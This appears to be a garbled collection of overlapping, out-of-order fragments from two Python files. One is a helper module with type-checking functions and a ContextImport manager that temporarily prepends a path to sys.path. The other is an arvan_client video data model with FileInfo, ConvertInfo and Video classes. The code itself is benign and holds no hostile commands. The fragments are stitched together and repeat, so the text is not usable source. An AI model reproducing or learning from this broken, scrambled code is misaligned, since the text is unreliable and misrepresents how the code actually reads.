ContextImport('dir.fi',", "<gh_stars>0 \"\"\" Auxiliary functions that have no dependencies \"\"\" # --------------------------- # Imports", "def __enter__(self): if self.extra_dir is not None: sys.path.insert(0, self.extra_dir) return import_module(self.module) def __exit__(self,", "return s[:-3] if s.endswith('.py') else s self.module = remove_py(p.basename(module)) if (extra_dir is None)", "\"\"\" def remove_py(s): return s[:-3] if s.endswith('.py') else s self.module = remove_py(p.basename(module)) if", "extra dir to sys.path and imports the module, Example: >>> # /path/dir/fi.py >>>", "ContextImport('/path/dir/fi.py') as module: >>> # prepends '/path/dir' to sys.path >>> # module =", "/path/dir/fi.py >>> with ContextImport('/path/dir/fi.py') as module: >>> # prepends '/path/dir' to sys.path >>>", "--------------------------- def check_type(value, oktypes): # This allows 'Space' instead of 'Space()' if callable(value):", "from collections import OrderedDict import sys import os.path as p from importlib import", "value def check_group(value, group): if value not in group: tag = type(value).__name__ msg", "else: return value def check_group(value, group): if value not in group: tag =", "sys.path >>> # module = import_module('dir.fi') >>> module.main() \"\"\" def __init__(self, module, extra_dir=None):", "file path from that only basename without .py is used :param extra_dir: str", "that have no dependencies \"\"\" # --------------------------- # Imports # --------------------------- from collections", "oktypes): tag = type(value).__name__ msg = 'received {} but expected {}'.format(tag, oktypes) raise", "dir if None \"\"\" def remove_py(s): return s[:-3] if s.endswith('.py') else s self.module", "module: str module spec for import or file path from that only basename", "as p from importlib import import_module # --------------------------- # Functions # --------------------------- def", "dependencies \"\"\" # --------------------------- # Imports # 
--------------------------- from collections import OrderedDict import", "# --------------------------- from collections import OrderedDict import sys import os.path as p from", "return value def check_group(value, group): if value not in group: tag = type(value).__name__", "context manager. Temporarily prepends extra dir to sys.path and imports the module, Example:", "# prepends '/path' to sys.path >>> # module = import_module('dir.fi') >>> module.main() \"\"\"", "= extra_dir def __enter__(self): if self.extra_dir is not None: sys.path.insert(0, self.extra_dir) return import_module(self.module)", "\"\"\" Import module context manager. Temporarily prepends extra dir to sys.path and imports", "as module: >>> # prepends '/path' to sys.path >>> # module = import_module('dir.fi')", "used :param extra_dir: str or None extra dir to prepend to sys.path if", "oktypes): # This allows 'Space' instead of 'Space()' if callable(value): value = value()", "but expected {}'.format(tag, oktypes) raise TypeError(msg) else: return value def check_group(value, group): if", "to sys.path and imports the module, Example: >>> # /path/dir/fi.py >>> with ContextImport('/path/dir/fi.py')", "# --------------------------- # Classes # --------------------------- class ContextImport: \"\"\" Import module context manager.", "# module = import_module('fi') >>> module.main() >>> with ContextImport('dir.fi', '/path') as module: >>>", "or file path from that only basename without .py is used :param extra_dir:", "!= p.basename(module)): extra_dir = p.dirname(module) self.extra_dir = extra_dir def __enter__(self): if self.extra_dir is", "raise TypeError(msg) else: return value def check_group(value, group): if value not in group:", "{}'.format(tag, repr(group)) raise TypeError(msg) else: return value def encode_dict(tag, content): return OrderedDict(((\"t\", tag),", "prepends '/path/dir' to sys.path >>> # module = import_module('fi') >>> module.main() >>> with", "p.basename(module)): extra_dir = 
p.dirname(module) self.extra_dir = extra_dir def __enter__(self): if self.extra_dir is not", "functions that have no dependencies \"\"\" # --------------------------- # Imports # --------------------------- from", ">>> module.main() \"\"\" def __init__(self, module, extra_dir=None): \"\"\" :param module: str module spec", "__enter__(self): if self.extra_dir is not None: sys.path.insert(0, self.extra_dir) return import_module(self.module) def __exit__(self, exc_type,", "collections import OrderedDict import sys import os.path as p from importlib import import_module", "or None extra dir to prepend to sys.path if module then doesn't change", "module.main() \"\"\" def __init__(self, module, extra_dir=None): \"\"\" :param module: str module spec for", "for import or file path from that only basename without .py is used", "with ContextImport('dir.fi', '/path') as module: >>> # prepends '/path' to sys.path >>> #", "module = import_module('fi') >>> module.main() >>> with ContextImport('dir.fi', '/path') as module: >>> #", "import_module('dir.fi') >>> module.main() \"\"\" def __init__(self, module, extra_dir=None): \"\"\" :param module: str module", "file then prepends dir if None \"\"\" def remove_py(s): return s[:-3] if s.endswith('.py')", "class ContextImport: \"\"\" Import module context manager. 
Temporarily prepends extra dir to sys.path", "to prepend to sys.path if module then doesn't change sys.path if None if", "encode_dict(tag, content): return OrderedDict(((\"t\", tag), (\"c\", content))) # --------------------------- # Classes # ---------------------------", "module spec for import or file path from that only basename without .py", "value not in group: tag = type(value).__name__ msg = 'element {} not in", "type(value).__name__ msg = 'element {} not in group {}'.format(tag, repr(group)) raise TypeError(msg) else:", "p from importlib import import_module # --------------------------- # Functions # --------------------------- def check_type(value,", "__init__(self, module, extra_dir=None): \"\"\" :param module: str module spec for import or file", ":param extra_dir: str or None extra dir to prepend to sys.path if module", "module then doesn't change sys.path if None if file then prepends dir if", "if module then doesn't change sys.path if None if file then prepends dir", "import os.path as p from importlib import import_module # --------------------------- # Functions #", "'/path' to sys.path >>> # module = import_module('dir.fi') >>> module.main() \"\"\" def __init__(self,", "ContextImport: \"\"\" Import module context manager. 
Temporarily prepends extra dir to sys.path and", "# --------------------------- # Functions # --------------------------- def check_type(value, oktypes): # This allows 'Space'", "not in group: tag = type(value).__name__ msg = 'element {} not in group", "not in group {}'.format(tag, repr(group)) raise TypeError(msg) else: return value def encode_dict(tag, content):", "if file then prepends dir if None \"\"\" def remove_py(s): return s[:-3] if", "if (extra_dir is None) and (module != p.basename(module)): extra_dir = p.dirname(module) self.extra_dir =", "# Imports # --------------------------- from collections import OrderedDict import sys import os.path as", "module: >>> # prepends '/path/dir' to sys.path >>> # module = import_module('fi') >>>", "only basename without .py is used :param extra_dir: str or None extra dir", "else s self.module = remove_py(p.basename(module)) if (extra_dir is None) and (module != p.basename(module)):", "Example: >>> # /path/dir/fi.py >>> with ContextImport('/path/dir/fi.py') as module: >>> # prepends '/path/dir'", "# --------------------------- def check_type(value, oktypes): # This allows 'Space' instead of 'Space()' if", "p.dirname(module) self.extra_dir = extra_dir def __enter__(self): if self.extra_dir is not None: sys.path.insert(0, self.extra_dir)", "os.path as p from importlib import import_module # --------------------------- # Functions # ---------------------------", "= 'received {} but expected {}'.format(tag, oktypes) raise TypeError(msg) else: return value def", "change sys.path if None if file then prepends dir if None \"\"\" def", "the module, Example: >>> # /path/dir/fi.py >>> with ContextImport('/path/dir/fi.py') as module: >>> #", "\"\"\" # --------------------------- # Imports # --------------------------- from collections import OrderedDict import sys", "group): if value not in group: tag = type(value).__name__ msg = 'element {}", "dir to sys.path and imports the module, Example: >>> # /path/dir/fi.py >>> with", "from 
that only basename without .py is used :param extra_dir: str or None", "value() if not isinstance(value, oktypes): tag = type(value).__name__ msg = 'received {} but", "value = value() if not isinstance(value, oktypes): tag = type(value).__name__ msg = 'received", ">>> # prepends '/path' to sys.path >>> # module = import_module('dir.fi') >>> module.main()", "remove_py(p.basename(module)) if (extra_dir is None) and (module != p.basename(module)): extra_dir = p.dirname(module) self.extra_dir", "'Space()' if callable(value): value = value() if not isinstance(value, oktypes): tag = type(value).__name__", "(extra_dir is None) and (module != p.basename(module)): extra_dir = p.dirname(module) self.extra_dir = extra_dir", "group {}'.format(tag, repr(group)) raise TypeError(msg) else: return value def encode_dict(tag, content): return OrderedDict(((\"t\",", ">>> module.main() >>> with ContextImport('dir.fi', '/path') as module: >>> # prepends '/path' to", "Imports # --------------------------- from collections import OrderedDict import sys import os.path as p", "import or file path from that only basename without .py is used :param", "sys.path and imports the module, Example: >>> # /path/dir/fi.py >>> with ContextImport('/path/dir/fi.py') as", "# prepends '/path/dir' to sys.path >>> # module = import_module('fi') >>> module.main() >>>", "\"\"\" Auxiliary functions that have no dependencies \"\"\" # --------------------------- # Imports #", "# This allows 'Space' instead of 'Space()' if callable(value): value = value() if", "callable(value): value = value() if not isinstance(value, oktypes): tag = type(value).__name__ msg =", "doesn't change sys.path if None if file then prepends dir if None \"\"\"", "msg = 'received {} but expected {}'.format(tag, oktypes) raise TypeError(msg) else: return value", "if None \"\"\" def remove_py(s): return s[:-3] if s.endswith('.py') else s self.module =", "from importlib import import_module # --------------------------- # Functions # 
--------------------------- def check_type(value, oktypes):", "check_group(value, group): if value not in group: tag = type(value).__name__ msg = 'element", "spec for import or file path from that only basename without .py is", "value def encode_dict(tag, content): return OrderedDict(((\"t\", tag), (\"c\", content))) # --------------------------- # Classes", "of 'Space()' if callable(value): value = value() if not isinstance(value, oktypes): tag =", "expected {}'.format(tag, oktypes) raise TypeError(msg) else: return value def check_group(value, group): if value", "check_type(value, oktypes): # This allows 'Space' instead of 'Space()' if callable(value): value =", "extra dir to prepend to sys.path if module then doesn't change sys.path if", "self.extra_dir) return import_module(self.module) def __exit__(self, exc_type, exc_value, traceback): if self.extra_dir is not None:", "tag = type(value).__name__ msg = 'element {} not in group {}'.format(tag, repr(group)) raise", "Functions # --------------------------- def check_type(value, oktypes): # This allows 'Space' instead of 'Space()'", "s.endswith('.py') else s self.module = remove_py(p.basename(module)) if (extra_dir is None) and (module !=", "= type(value).__name__ msg = 'received {} but expected {}'.format(tag, oktypes) raise TypeError(msg) else:", ">>> # prepends '/path/dir' to sys.path >>> # module = import_module('fi') >>> module.main()", "tag = type(value).__name__ msg = 'received {} but expected {}'.format(tag, oktypes) raise TypeError(msg)", "return OrderedDict(((\"t\", tag), (\"c\", content))) # --------------------------- # Classes # --------------------------- class ContextImport:", "Temporarily prepends extra dir to sys.path and imports the module, Example: >>> #", "content): return OrderedDict(((\"t\", tag), (\"c\", content))) # --------------------------- # Classes # --------------------------- class", "self.module = remove_py(p.basename(module)) if (extra_dir is None) and (module != 
p.basename(module)): extra_dir =", "sys.path.insert(0, self.extra_dir) return import_module(self.module) def __exit__(self, exc_type, exc_value, traceback): if self.extra_dir is not", "if value not in group: tag = type(value).__name__ msg = 'element {} not", "\"\"\" :param module: str module spec for import or file path from that", "then prepends dir if None \"\"\" def remove_py(s): return s[:-3] if s.endswith('.py') else", ">>> with ContextImport('dir.fi', '/path') as module: >>> # prepends '/path' to sys.path >>>", "not None: sys.path.insert(0, self.extra_dir) return import_module(self.module) def __exit__(self, exc_type, exc_value, traceback): if self.extra_dir", "import_module('fi') >>> module.main() >>> with ContextImport('dir.fi', '/path') as module: >>> # prepends '/path'", "import import_module # --------------------------- # Functions # --------------------------- def check_type(value, oktypes): # This", "isinstance(value, oktypes): tag = type(value).__name__ msg = 'received {} but expected {}'.format(tag, oktypes)", "OrderedDict import sys import os.path as p from importlib import import_module # ---------------------------", "prepends '/path' to sys.path >>> # module = import_module('dir.fi') >>> module.main() \"\"\" def", "prepends extra dir to sys.path and imports the module, Example: >>> # /path/dir/fi.py", "prepend to sys.path if module then doesn't change sys.path if None if file", "repr(group)) raise TypeError(msg) else: return value def encode_dict(tag, content): return OrderedDict(((\"t\", tag), (\"c\",", "self.extra_dir = extra_dir def __enter__(self): if self.extra_dir is not None: sys.path.insert(0, self.extra_dir) return", ">>> # module = import_module('dir.fi') >>> module.main() \"\"\" def __init__(self, module, extra_dir=None): \"\"\"", "None extra dir to prepend to sys.path if module then doesn't change sys.path", "extra_dir = p.dirname(module) self.extra_dir = extra_dir def __enter__(self): if self.extra_dir is not None:", 
"extra_dir=None): \"\"\" :param module: str module spec for import or file path from", "--------------------------- # Imports # --------------------------- from collections import OrderedDict import sys import os.path", "and imports the module, Example: >>> # /path/dir/fi.py >>> with ContextImport('/path/dir/fi.py') as module:", "--------------------------- class ContextImport: \"\"\" Import module context manager. Temporarily prepends extra dir to", "None) and (module != p.basename(module)): extra_dir = p.dirname(module) self.extra_dir = extra_dir def __enter__(self):", "sys import os.path as p from importlib import import_module # --------------------------- # Functions", "to sys.path if module then doesn't change sys.path if None if file then", ">>> # /path/dir/fi.py >>> with ContextImport('/path/dir/fi.py') as module: >>> # prepends '/path/dir' to", "= type(value).__name__ msg = 'element {} not in group {}'.format(tag, repr(group)) raise TypeError(msg)", "TypeError(msg) else: return value def encode_dict(tag, content): return OrderedDict(((\"t\", tag), (\"c\", content))) #", "if s.endswith('.py') else s self.module = remove_py(p.basename(module)) if (extra_dir is None) and (module", "return import_module(self.module) def __exit__(self, exc_type, exc_value, traceback): if self.extra_dir is not None: sys.path.pop(0)", "'Space' instead of 'Space()' if callable(value): value = value() if not isinstance(value, oktypes):", "= import_module('dir.fi') >>> module.main() \"\"\" def __init__(self, module, extra_dir=None): \"\"\" :param module: str", ">>> # module = import_module('fi') >>> module.main() >>> with ContextImport('dir.fi', '/path') as module:", "sys.path if module then doesn't change sys.path if None if file then prepends", "def encode_dict(tag, content): return OrderedDict(((\"t\", tag), (\"c\", content))) # --------------------------- # Classes #", "= 'element {} not in group {}'.format(tag, repr(group)) raise TypeError(msg) else: return value", "imports the 
module, Example: >>> # /path/dir/fi.py >>> with ContextImport('/path/dir/fi.py') as module: >>>", "s[:-3] if s.endswith('.py') else s self.module = remove_py(p.basename(module)) if (extra_dir is None) and", "= remove_py(p.basename(module)) if (extra_dir is None) and (module != p.basename(module)): extra_dir = p.dirname(module)", "manager. Temporarily prepends extra dir to sys.path and imports the module, Example: >>>", "--------------------------- # Classes # --------------------------- class ContextImport: \"\"\" Import module context manager. Temporarily", "import OrderedDict import sys import os.path as p from importlib import import_module #", "module context manager. Temporarily prepends extra dir to sys.path and imports the module,", "dir to prepend to sys.path if module then doesn't change sys.path if None", "{}'.format(tag, oktypes) raise TypeError(msg) else: return value def check_group(value, group): if value not", "module: >>> # prepends '/path' to sys.path >>> # module = import_module('dir.fi') >>>", "Classes # --------------------------- class ContextImport: \"\"\" Import module context manager. Temporarily prepends extra", "str module spec for import or file path from that only basename without", "Import module context manager. 
Temporarily prepends extra dir to sys.path and imports the", "import_module # --------------------------- # Functions # --------------------------- def check_type(value, oktypes): # This allows", "to sys.path >>> # module = import_module('dir.fi') >>> module.main() \"\"\" def __init__(self, module,", "without .py is used :param extra_dir: str or None extra dir to prepend", "# --------------------------- # Imports # --------------------------- from collections import OrderedDict import sys import", "not isinstance(value, oktypes): tag = type(value).__name__ msg = 'received {} but expected {}'.format(tag,", "path from that only basename without .py is used :param extra_dir: str or", "(module != p.basename(module)): extra_dir = p.dirname(module) self.extra_dir = extra_dir def __enter__(self): if self.extra_dir", "have no dependencies \"\"\" # --------------------------- # Imports # --------------------------- from collections import", "in group: tag = type(value).__name__ msg = 'element {} not in group {}'.format(tag,", "def __init__(self, module, extra_dir=None): \"\"\" :param module: str module spec for import or", "= value() if not isinstance(value, oktypes): tag = type(value).__name__ msg = 'received {}", "is not None: sys.path.insert(0, self.extra_dir) return import_module(self.module) def __exit__(self, exc_type, exc_value, traceback): if", "# /path/dir/fi.py >>> with ContextImport('/path/dir/fi.py') as module: >>> # prepends '/path/dir' to sys.path", "with ContextImport('/path/dir/fi.py') as module: >>> # prepends '/path/dir' to sys.path >>> # module", "This allows 'Space' instead of 'Space()' if callable(value): value = value() if not", "def remove_py(s): return s[:-3] if s.endswith('.py') else s self.module = remove_py(p.basename(module)) if (extra_dir", "remove_py(s): return s[:-3] if s.endswith('.py') else s self.module = remove_py(p.basename(module)) if (extra_dir is", "TypeError(msg) else: return value def check_group(value, group): if value not in group: 
tag", "s self.module = remove_py(p.basename(module)) if (extra_dir is None) and (module != p.basename(module)): extra_dir", "extra_dir def __enter__(self): if self.extra_dir is not None: sys.path.insert(0, self.extra_dir) return import_module(self.module) def", "'received {} but expected {}'.format(tag, oktypes) raise TypeError(msg) else: return value def check_group(value,", "oktypes) raise TypeError(msg) else: return value def check_group(value, group): if value not in", "# --------------------------- class ContextImport: \"\"\" Import module context manager. Temporarily prepends extra dir", "if None if file then prepends dir if None \"\"\" def remove_py(s): return", "None: sys.path.insert(0, self.extra_dir) return import_module(self.module) def __exit__(self, exc_type, exc_value, traceback): if self.extra_dir is", "None if file then prepends dir if None \"\"\" def remove_py(s): return s[:-3]", "that only basename without .py is used :param extra_dir: str or None extra", "ContextImport('dir.fi', '/path') as module: >>> # prepends '/path' to sys.path >>> # module", "module = import_module('dir.fi') >>> module.main() \"\"\" def __init__(self, module, extra_dir=None): \"\"\" :param module:", "module, Example: >>> # /path/dir/fi.py >>> with ContextImport('/path/dir/fi.py') as module: >>> # prepends", "prepends dir if None \"\"\" def remove_py(s): return s[:-3] if s.endswith('.py') else s", "{} not in group {}'.format(tag, repr(group)) raise TypeError(msg) else: return value def encode_dict(tag,", "--------------------------- from collections import OrderedDict import sys import os.path as p from importlib", "to sys.path >>> # module = import_module('fi') >>> module.main() >>> with ContextImport('dir.fi', '/path')", "str or None extra dir to prepend to sys.path if module then doesn't", "module.main() >>> with ContextImport('dir.fi', '/path') as module: >>> # prepends '/path' to sys.path", "is used :param extra_dir: str or None extra dir to prepend to sys.path", 
"sys.path if None if file then prepends dir if None \"\"\" def remove_py(s):", "allows 'Space' instead of 'Space()' if callable(value): value = value() if not isinstance(value,", "if self.extra_dir is not None: sys.path.insert(0, self.extra_dir) return import_module(self.module) def __exit__(self, exc_type, exc_value,", "# Classes # --------------------------- class ContextImport: \"\"\" Import module context manager. Temporarily prepends", "# Functions # --------------------------- def check_type(value, oktypes): # This allows 'Space' instead of", "importlib import import_module # --------------------------- # Functions # --------------------------- def check_type(value, oktypes): #", "'/path') as module: >>> # prepends '/path' to sys.path >>> # module =", "extra_dir: str or None extra dir to prepend to sys.path if module then", "then doesn't change sys.path if None if file then prepends dir if None", "{} but expected {}'.format(tag, oktypes) raise TypeError(msg) else: return value def check_group(value, group):", "raise TypeError(msg) else: return value def encode_dict(tag, content): return OrderedDict(((\"t\", tag), (\"c\", content)))", "sys.path >>> # module = import_module('fi') >>> module.main() >>> with ContextImport('dir.fi', '/path') as", "module, extra_dir=None): \"\"\" :param module: str module spec for import or file path", "basename without .py is used :param extra_dir: str or None extra dir to", "return value def encode_dict(tag, content): return OrderedDict(((\"t\", tag), (\"c\", content))) # --------------------------- #", ".py is used :param extra_dir: str or None extra dir to prepend to", "as module: >>> # prepends '/path/dir' to sys.path >>> # module = import_module('fi')", "= p.dirname(module) self.extra_dir = extra_dir def __enter__(self): if self.extra_dir is not None: sys.path.insert(0,", "instead of 'Space()' if callable(value): value = value() if not isinstance(value, oktypes): tag", "type(value).__name__ msg = 'received {} but expected 
{}'.format(tag, oktypes) raise TypeError(msg) else: return", "def check_type(value, oktypes): # This allows 'Space' instead of 'Space()' if callable(value): value", "and (module != p.basename(module)): extra_dir = p.dirname(module) self.extra_dir = extra_dir def __enter__(self): if", ":param module: str module spec for import or file path from that only", "msg = 'element {} not in group {}'.format(tag, repr(group)) raise TypeError(msg) else: return", "'element {} not in group {}'.format(tag, repr(group)) raise TypeError(msg) else: return value def", "tag), (\"c\", content))) # --------------------------- # Classes # --------------------------- class ContextImport: \"\"\" Import", "group: tag = type(value).__name__ msg = 'element {} not in group {}'.format(tag, repr(group))", "no dependencies \"\"\" # --------------------------- # Imports # --------------------------- from collections import OrderedDict", "content))) # --------------------------- # Classes # --------------------------- class ContextImport: \"\"\" Import module context", "in group {}'.format(tag, repr(group)) raise TypeError(msg) else: return value def encode_dict(tag, content): return" ]
[ "None if 'general' in kwargs: self.general = self.General(**kwargs['general']) del kwargs['general'] if 'video' in", "status: str job_status_url: str available: bool convert_mode: str convert_info: List[ConvertInfo] created_at: str updated_at:", "available: bool convert_mode: str convert_info: List[ConvertInfo] created_at: str updated_at: str completed_at: str parallel_convert:", "bit_rate: int size: int class Video(DynamicType): codec: str width: int height: int frame_rate:", "import List from arvan_client.arvan.types import DynamicType class FileInfo(DynamicType): class General(DynamicType): duration: int format:", "'video' in kwargs: if kwargs['video']: self.video = self.Video(**kwargs['video']) del kwargs['video'] if 'audio' in", "str convert_info: List[ConvertInfo] created_at: str updated_at: str completed_at: str parallel_convert: int directory_size: str", "int video_bitrate: int resolution: str def __str__(self): return self.resolution class Video(DynamicType): video_id: str", "tooltip_url: str video_url: str player_url: str # channel: Channel def __init__(self, **kwargs): if", "str bit_rate: str class Audio(DynamicType): codec: str sample_rate: str bit_rate: str channel_layout: str", "str tooltip_url: str video_url: str player_url: str # channel: Channel def __init__(self, **kwargs):", "kwargs: self.convert_info = [] if 'convert_info' in kwargs: if isinstance(kwargs['convert_info'], list): for convert_info", "self.video = None self.audio = None if 'general' in kwargs: self.general = self.General(**kwargs['general'])", "for convert_info in kwargs['convert_info']: self.convert_info.append(ConvertInfo(**convert_info)) del kwargs['convert_info'] if 'mp4_videos' in kwargs: self.mp4_videos =", "bit_rate: str channel_layout: str def __init__(self, **kwargs): self.general = None self.video = None", "self.video = self.Video(**kwargs['video']) del kwargs['video'] if 'audio' in kwargs: if kwargs['audio']: self.audio =", "= self.General(**kwargs['general']) del 
kwargs['general'] if 'video' in kwargs: if kwargs['video']: self.video = self.Video(**kwargs['video'])", "int resolution: str def __str__(self): return self.resolution class Video(DynamicType): video_id: str title: str", "channel: Channel def __init__(self, **kwargs): if 'convert_info' in kwargs: self.convert_info = [] if", "in kwargs: self.convert_info = [] if 'convert_info' in kwargs: if isinstance(kwargs['convert_info'], list): for", "return self.resolution class Video(DynamicType): video_id: str title: str description: str file_info: FileInfo thumbnail_time:", "def __str__(self): return self.general.format or super().__str__() class ConvertInfo(DynamicType): audio_bitrate: int video_bitrate: int resolution:", "str def __init__(self, **kwargs): self.general = None self.video = None self.audio = None", "'audio' in kwargs: if kwargs['audio']: self.audio = self.Audio(**kwargs['audio']) del kwargs['audio'] super().__init__(**kwargs) def __str__(self):", "def __init__(self, **kwargs): if 'convert_info' in kwargs: self.convert_info = [] if 'convert_info' in", "video_id: str title: str description: str file_info: FileInfo thumbnail_time: int status: str job_status_url:", "= [] if 'convert_info' in kwargs: if isinstance(kwargs['convert_info'], list): for convert_info in kwargs['convert_info']:", "__str__(self): return self.resolution class Video(DynamicType): video_id: str title: str description: str file_info: FileInfo", "class FileInfo(DynamicType): class General(DynamicType): duration: int format: str bit_rate: int size: int class", "directory_size: str config_url: str mp4_videos: List[str] hls_playlist: str dash_playlist: str thumbnail_url: str tooltip_url:", "kwargs['video'] if 'audio' in kwargs: if kwargs['audio']: self.audio = self.Audio(**kwargs['audio']) del kwargs['audio'] super().__init__(**kwargs)", "in kwargs['convert_info']: self.convert_info.append(ConvertInfo(**convert_info)) del kwargs['convert_info'] if 'mp4_videos' in kwargs: self.mp4_videos = 
kwargs['mp4_videos'] del", "thumbnail_url: str tooltip_url: str video_url: str player_url: str # channel: Channel def __init__(self,", "= None self.video = None self.audio = None if 'general' in kwargs: self.general", "video_bitrate: int resolution: str def __str__(self): return self.resolution class Video(DynamicType): video_id: str title:", "audio_bitrate: int video_bitrate: int resolution: str def __str__(self): return self.resolution class Video(DynamicType): video_id:", "kwargs: if isinstance(kwargs['convert_info'], list): for convert_info in kwargs['convert_info']: self.convert_info.append(ConvertInfo(**convert_info)) del kwargs['convert_info'] if 'mp4_videos'", "= kwargs['mp4_videos'] del kwargs['mp4_videos'] if 'id' in kwargs: kwargs['video_id'] = kwargs.pop('id') del kwargs['channel']", "size: int class Video(DynamicType): codec: str width: int height: int frame_rate: str bit_rate:", "convert_mode: str convert_info: List[ConvertInfo] created_at: str updated_at: str completed_at: str parallel_convert: int directory_size:", "class Audio(DynamicType): codec: str sample_rate: str bit_rate: str channel_layout: str def __init__(self, **kwargs):", "self.resolution class Video(DynamicType): video_id: str title: str description: str file_info: FileInfo thumbnail_time: int", "class Video(DynamicType): codec: str width: int height: int frame_rate: str bit_rate: str class", "self.convert_info.append(ConvertInfo(**convert_info)) del kwargs['convert_info'] if 'mp4_videos' in kwargs: self.mp4_videos = kwargs['mp4_videos'] del kwargs['mp4_videos'] if", "<filename>arvan_client/vod/video.py from typing import List from arvan_client.arvan.types import DynamicType class FileInfo(DynamicType): class General(DynamicType):", "job_status_url: str available: bool convert_mode: str convert_info: List[ConvertInfo] created_at: str updated_at: str completed_at:", "str def __str__(self): return self.resolution class Video(DynamicType): video_id: str title: str description: str", "str 
config_url: str mp4_videos: List[str] hls_playlist: str dash_playlist: str thumbnail_url: str tooltip_url: str", "channel_layout: str def __init__(self, **kwargs): self.general = None self.video = None self.audio =", "**kwargs): if 'convert_info' in kwargs: self.convert_info = [] if 'convert_info' in kwargs: if", "convert_info: List[ConvertInfo] created_at: str updated_at: str completed_at: str parallel_convert: int directory_size: str config_url:", "self.audio = self.Audio(**kwargs['audio']) del kwargs['audio'] super().__init__(**kwargs) def __str__(self): return self.general.format or super().__str__() class", "str class Audio(DynamicType): codec: str sample_rate: str bit_rate: str channel_layout: str def __init__(self,", "self.audio = None if 'general' in kwargs: self.general = self.General(**kwargs['general']) del kwargs['general'] if", "self.convert_info = [] if 'convert_info' in kwargs: if isinstance(kwargs['convert_info'], list): for convert_info in", "**kwargs): self.general = None self.video = None self.audio = None if 'general' in", "arvan_client.arvan.types import DynamicType class FileInfo(DynamicType): class General(DynamicType): duration: int format: str bit_rate: int", "if 'mp4_videos' in kwargs: self.mp4_videos = kwargs['mp4_videos'] del kwargs['mp4_videos'] if 'id' in kwargs:", "str bit_rate: int size: int class Video(DynamicType): codec: str width: int height: int", "def __init__(self, **kwargs): self.general = None self.video = None self.audio = None if", "created_at: str updated_at: str completed_at: str parallel_convert: int directory_size: str config_url: str mp4_videos:", "kwargs['convert_info']: self.convert_info.append(ConvertInfo(**convert_info)) del kwargs['convert_info'] if 'mp4_videos' in kwargs: self.mp4_videos = kwargs['mp4_videos'] del kwargs['mp4_videos']", "Video(DynamicType): codec: str width: int height: int frame_rate: str bit_rate: str class Audio(DynamicType):", "bit_rate: str class Audio(DynamicType): codec: str sample_rate: 
str bit_rate: str channel_layout: str def", "kwargs['convert_info'] if 'mp4_videos' in kwargs: self.mp4_videos = kwargs['mp4_videos'] del kwargs['mp4_videos'] if 'id' in", "title: str description: str file_info: FileInfo thumbnail_time: int status: str job_status_url: str available:", "'convert_info' in kwargs: self.convert_info = [] if 'convert_info' in kwargs: if isinstance(kwargs['convert_info'], list):", "str updated_at: str completed_at: str parallel_convert: int directory_size: str config_url: str mp4_videos: List[str]", "in kwargs: self.mp4_videos = kwargs['mp4_videos'] del kwargs['mp4_videos'] if 'id' in kwargs: kwargs['video_id'] =", "class ConvertInfo(DynamicType): audio_bitrate: int video_bitrate: int resolution: str def __str__(self): return self.resolution class", "import DynamicType class FileInfo(DynamicType): class General(DynamicType): duration: int format: str bit_rate: int size:", "del kwargs['convert_info'] if 'mp4_videos' in kwargs: self.mp4_videos = kwargs['mp4_videos'] del kwargs['mp4_videos'] if 'id'", "self.General(**kwargs['general']) del kwargs['general'] if 'video' in kwargs: if kwargs['video']: self.video = self.Video(**kwargs['video']) del", "self.mp4_videos = kwargs['mp4_videos'] del kwargs['mp4_videos'] if 'id' in kwargs: kwargs['video_id'] = kwargs.pop('id') del", "dash_playlist: str thumbnail_url: str tooltip_url: str video_url: str player_url: str # channel: Channel", "str thumbnail_url: str tooltip_url: str video_url: str player_url: str # channel: Channel def", "list): for convert_info in kwargs['convert_info']: self.convert_info.append(ConvertInfo(**convert_info)) del kwargs['convert_info'] if 'mp4_videos' in kwargs: self.mp4_videos", "def __str__(self): return self.resolution class Video(DynamicType): video_id: str title: str description: str file_info:", "frame_rate: str bit_rate: str class Audio(DynamicType): codec: str sample_rate: str bit_rate: str channel_layout:", "file_info: FileInfo thumbnail_time: int status: str 
job_status_url: str available: bool convert_mode: str convert_info:", "List[ConvertInfo] created_at: str updated_at: str completed_at: str parallel_convert: int directory_size: str config_url: str", "kwargs['mp4_videos'] if 'id' in kwargs: kwargs['video_id'] = kwargs.pop('id') del kwargs['channel'] super().__init__(**kwargs) def __str__(self):", "parallel_convert: int directory_size: str config_url: str mp4_videos: List[str] hls_playlist: str dash_playlist: str thumbnail_url:", "kwargs['general'] if 'video' in kwargs: if kwargs['video']: self.video = self.Video(**kwargs['video']) del kwargs['video'] if", "str bit_rate: str channel_layout: str def __init__(self, **kwargs): self.general = None self.video =", "super().__str__() class ConvertInfo(DynamicType): audio_bitrate: int video_bitrate: int resolution: str def __str__(self): return self.resolution", "str dash_playlist: str thumbnail_url: str tooltip_url: str video_url: str player_url: str # channel:", "int format: str bit_rate: int size: int class Video(DynamicType): codec: str width: int", "int directory_size: str config_url: str mp4_videos: List[str] hls_playlist: str dash_playlist: str thumbnail_url: str", "= None if 'general' in kwargs: self.general = self.General(**kwargs['general']) del kwargs['general'] if 'video'", "str job_status_url: str available: bool convert_mode: str convert_info: List[ConvertInfo] created_at: str updated_at: str", "General(DynamicType): duration: int format: str bit_rate: int size: int class Video(DynamicType): codec: str", "ConvertInfo(DynamicType): audio_bitrate: int video_bitrate: int resolution: str def __str__(self): return self.resolution class Video(DynamicType):", "int class Video(DynamicType): codec: str width: int height: int frame_rate: str bit_rate: str", "kwargs['audio']: self.audio = self.Audio(**kwargs['audio']) del kwargs['audio'] super().__init__(**kwargs) def __str__(self): return self.general.format or super().__str__()", "super().__init__(**kwargs) def 
__str__(self): return self.general.format or super().__str__() class ConvertInfo(DynamicType): audio_bitrate: int video_bitrate: int", "str width: int height: int frame_rate: str bit_rate: str class Audio(DynamicType): codec: str", "None self.video = None self.audio = None if 'general' in kwargs: self.general =", "updated_at: str completed_at: str parallel_convert: int directory_size: str config_url: str mp4_videos: List[str] hls_playlist:", "self.general.format or super().__str__() class ConvertInfo(DynamicType): audio_bitrate: int video_bitrate: int resolution: str def __str__(self):", "class Video(DynamicType): video_id: str title: str description: str file_info: FileInfo thumbnail_time: int status:", "str # channel: Channel def __init__(self, **kwargs): if 'convert_info' in kwargs: self.convert_info =", "or super().__str__() class ConvertInfo(DynamicType): audio_bitrate: int video_bitrate: int resolution: str def __str__(self): return", "self.general = self.General(**kwargs['general']) del kwargs['general'] if 'video' in kwargs: if kwargs['video']: self.video =", "str mp4_videos: List[str] hls_playlist: str dash_playlist: str thumbnail_url: str tooltip_url: str video_url: str", "int frame_rate: str bit_rate: str class Audio(DynamicType): codec: str sample_rate: str bit_rate: str", "kwargs: if kwargs['video']: 